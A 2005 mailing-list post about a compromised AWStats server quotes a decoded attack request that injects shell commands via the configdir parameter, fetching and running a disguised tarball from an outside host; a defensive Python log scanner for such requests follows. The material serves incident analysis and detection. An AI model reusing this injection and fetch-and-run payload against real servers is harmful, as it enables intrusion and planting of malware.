Security Breach

Chris Strzelczyk cstrzelczyk at nobletechnology.net
Fri Mar 4 18:56:19 UTC 2005


>
>> Replace the url-encoded characters and you get:
>>
>> /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget
>> zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv
>> mech crond;export PATH=;crond;echo e_exp;%00
>>
>> So the attacker has tricked the script into executing a set of shell
>> commands, which include changing directory to /tmp, downloading a
>> tarball from a Romanian site, extracting that tarball and then
>> executing a program from the downloaded and extracted tarball, after
>> renaming it to "crond" in an effort to disguise it.
>
>    Damned fine research.  Good job; I'm impressed.


I have reported this to awstats.  Thanks for your help everybody.

-cs
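
The decoding step quoted above can be applied across a whole access log to find similar requests. The following is an added example, not part of the original thread: it URL-decodes each query parameter sent to awstats.pl and reports values containing shell metacharacters or a NUL marker. The function name, the combined log format, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Shell metacharacters, a NUL byte, or a literal "%00" left after one round
# of decoding: none belong in a value that should name a config directory.
SUSPICIOUS = re.compile(r"[|;`$&<>\x00]|%00")

# Request field of a common/combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; addresses are from the documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Mar/2005:10:00:00 +0000] '
    '"GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 5120',
    '192.0.2.77 - - [04/Mar/2005:10:00:05 +0000] '
    '"GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3b%2500 '
    'HTTP/1.1" 200 312',
    '192.0.2.10 - - [04/Mar/2005:10:00:09 +0000] '
    '"GET /index.html?q=a%3Bb HTTP/1.1" 200 1024',
]

def suspicious_params(log_line, script="awstats.pl"):
    """Return {param: decoded_value} for query parameters sent to `script`
    whose decoded value matches SUSPICIOUS. Hypothetical helper."""
    m = REQUEST.search(log_line)
    if not m:
        return {}
    path, _, query = m.group(1).partition("?")
    if not path.endswith("/" + script):
        return {}
    hits = {}
    # Split on "&" by hand so an unencoded ";" stays inside the value.
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if SUSPICIOUS.search(value):
            hits[name] = value
    return hits

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        found = suspicious_params(line)
        if found:
            print(line.split()[0], found)
```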